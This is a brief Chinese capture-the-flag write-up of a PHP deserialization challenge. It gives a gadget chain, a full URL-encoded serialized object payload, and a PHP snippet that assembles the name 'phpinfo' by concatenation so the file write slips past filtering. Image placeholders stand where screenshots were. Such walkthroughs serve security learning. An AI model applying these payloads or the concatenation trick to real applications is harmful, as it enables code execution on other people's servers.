反序列化很明显

superman->AT->mjh->mrcloud->wubin->__invoke

1
?payload=O%3A8%3A%22superman%22%3A1%3A%7Bs%3A6%3A%22master%22%3BO%3A2%3A%22AT%22%3A1%3A%7Bs%3A9%3A%22nextlevel%22%3BO%3A3%3A%22mjh%22%3A2%3A%7Bs%3A6%3A%22action%22%3Bs%3A8%3A%22password%22%3Bs%3A3%3A%22run%22%3BO%3A7%3A%22mrcloud%22%3A1%3A%7Bs%3A6%3A%22result%22%3BO%3A5%3A%22wubin%22%3A1%3A%7Bs%3A9%3A%22lastlevel%22%3Bs%3A7%3A%22Haoyuan%22%3B%7D%7D%7D%7D%7D

完成后会输出一个文件名

image-20260510163831775

访问这里可以写php文件

1
2
3
4
<?=
$s="ph"."pinfo";
$s();
?>

image-20260510164016363

根据路径访问

image-20260510164049542